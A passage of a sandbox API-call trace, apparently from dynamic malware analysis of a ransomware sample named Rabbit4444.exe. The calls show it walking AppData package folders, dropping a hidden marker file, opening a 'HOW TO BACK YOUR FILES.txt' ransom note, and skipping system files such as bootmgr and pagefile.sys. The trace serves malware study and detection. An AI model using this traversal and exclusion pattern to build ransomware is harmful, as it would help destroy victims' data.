BACK YOUR FILES.txt") returned -1 [0056.027] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.027] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.027] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.027] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e32663, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab5ecb2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.027] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.027] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.027] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.027] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.027] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.027] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab5ecb2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab5ecb2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab850cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.027] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.027] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.027] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab5ecb2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab5ecb2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab850cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.027] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0056.027] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.027] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.027] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.027] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.028] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.028] CloseHandle (hObject=0x278) returned 1 [0056.028] CloseHandle (hObject=0x27c) returned 1 [0056.028] GetCurrentThreadId () returned 0xd98 [0056.028] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0056.028] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData" [0056.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118f48 | out: hHeap=0xe0000) returned 1 [0056.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0056.028] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData" [0056.028] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\" [0056.028] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0056.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.029] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.032] FlushFileBuffers (hFile=0x27c) returned 1 [0056.033] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.033] CloseHandle (hObject=0x27c) returned 1 [0056.033] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData") returned 80 [0056.033] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.033] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e31e63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab850cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0056.034] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.034] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.034] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.034] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.034] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e31e63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab850cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.034] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.034] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.034] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.034] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.034] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.034] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab850cc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab850cc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab850cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.034] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.034] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.034] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab850cc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab850cc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeab850cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.034] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0056.034] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.034] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.035] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.035] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.035] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.035] CloseHandle (hObject=0x278) returned 1 [0056.035] CloseHandle (hObject=0x27c) returned 1 [0056.035] GetCurrentThreadId () returned 0xd98 [0056.035] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0056.035] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC" [0056.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113378 | out: hHeap=0xe0000) returned 1 [0056.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0056.035] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC" [0056.035] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\" [0056.035] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0056.035] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.037] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.039] FlushFileBuffers (hFile=0x27c) returned 1 [0056.040] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.040] CloseHandle (hObject=0x27c) returned 1 [0056.041] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC") returned 75 [0056.041] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.041] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e3170f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab850cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0056.041] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.041] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.041] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.041] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.041] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2e3170f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeab850cc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.041] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.041] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.041] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.041] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.041] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.041] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab850cc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab850cc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeabab2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.041] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.041] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.041] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeab850cc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeab850cc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeabab2d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.041] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0056.041] lstrcpyW (in: lpString1=0x130ebd0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.041] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.053] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.053] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.053] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.053] CloseHandle (hObject=0x278) returned 1 [0056.053] CloseHandle (hObject=0x27c) returned 1 [0056.054] GetCurrentThreadId () returned 0xd98 [0056.054] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0056.054] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy" [0056.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113f58 | out: hHeap=0xe0000) returned 1 [0056.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0056.054] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy" [0056.054] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\" [0056.054] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0056.054] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.miracastview_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.058] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.061] FlushFileBuffers (hFile=0x27c) returned 1 [0056.062] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.062] CloseHandle (hObject=0x27c) returned 1 [0056.062] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy") returned 73 [0056.062] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.062] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x77c3f1ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeabd1839, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0056.063] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.063] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.063] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.063] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.063] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x77c3f1ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeabd1839, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.063] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.063] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.063] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.063] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.063] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.063] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeabd1839, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeabd1839, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeabd1839, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.063] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.063] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.063] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d33442, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9c13db32, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0056.063] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.063] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.063] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0056.063] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0056.063] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0056.063] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0056.063] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0056.063] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0056.063] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0056.063] lstrcmpiW 